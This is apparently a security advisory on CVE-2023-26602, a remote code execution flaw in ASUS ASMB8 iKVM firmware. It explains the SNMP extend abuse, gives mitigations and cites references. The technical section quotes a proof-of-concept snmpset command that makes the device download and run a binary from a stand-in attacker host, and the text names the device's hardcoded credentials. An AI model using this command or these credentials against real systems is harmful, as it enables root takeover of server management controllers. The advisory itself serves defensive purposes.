A critical Remote Code Execution (RCE) vulnerability has been identified in ASUS ASMB8 iKVM firmware versions ≤1.14.51, tracked as CVE-2023-26602. With a CVSS score of 9.8, this flaw allows attackers to execute arbitrary commands via SNMP write access, posing significant risks to enterprise environments using affected devices. Exploitation attempts have been observed in the wild as of January 2024, according to Feedly reports4.
Technical Analysis
The vulnerability stems from improper access controls in the SNMPv2 service of the ASMB8 iKVM firmware. Attackers can abuse the `NET-SNMP-EXTEND-MIB` module to execute shell commands with root privileges. A publicly available Proof of Concept (PoC) demonstrates how to deploy an ARM reverse shell using `snmpset`:1
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private <target> 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"wget http://attacker/rt.bin -O /tmp/rt.bin && chmod +x /tmp/rt.bin && /tmp/rt.bin\"'The exploit leverages hardcoded credentials (`sysadmin:superuser`) and bypasses SSH restrictions via the `defshell` mechanism. Successful exploitation grants full control over the Baseboard Management Controller (BMC), enabling persistent access to compromised systems.
Mitigation and Remediation
ASUS has not released an official patch as of April 2025. Recommended mitigation steps include:
- Disabling SNMP write access on all ASMB8 iKVM interfaces
- Isolating affected devices from untrusted networks
- Implementing network-level controls to monitor SNMP traffic patterns
Historical data shows similar vulnerabilities in ASUS hardware, including CVE-2008-1491 (ASMB3 DPC Proxy stack overflow) and CVE-2014-7269 (router RCE)2. This pattern underscores the need for continuous firmware updates and vendor monitoring.
Broader Impact
The EPSS score of 0.54% (74.4th percentile) suggests moderate exploitation likelihood4. However, the combination with other ASUS vulnerabilities (e.g., CVE-2024-33278 buffer overflow) could enable exploit chains for persistent network compromise. Organizations should prioritize:
| Risk Factor | Action |
|---|---|
| SNMP Exposure | Restrict to internal management networks |
| Firmware Integrity | Verify checksums before deployment |
| Network Segmentation | Isolate BMC interfaces from production traffic |
Security teams should reference NVD’s technical analysis2 and monitor ASUS advisories for patch availability. The Exploit-DB entry (ID 52244)1 provides additional technical context for detection rule development.
Conclusion
CVE-2023-26602 represents a critical threat to organizations using ASUS ASMB8 iKVM devices for remote server management. While workarounds exist, the lack of a firmware patch necessitates heightened monitoring for SNMP-based attack patterns. This vulnerability highlights the ongoing challenges in securing embedded management interfaces against RCE threats.
References
- “ASUS ASMB8 iKVM 1.14.51 – Remote Code Execution,” Exploit-DB, 2023.
- “CVE-2023-26602 Detail,” NIST NVD, 2023.
- “ASUS ASMB8 iKVM Product Page,” ASUS, 2025.
- “CVE-2023-26602 Exploitation Timeline,” Feedly, 2024.
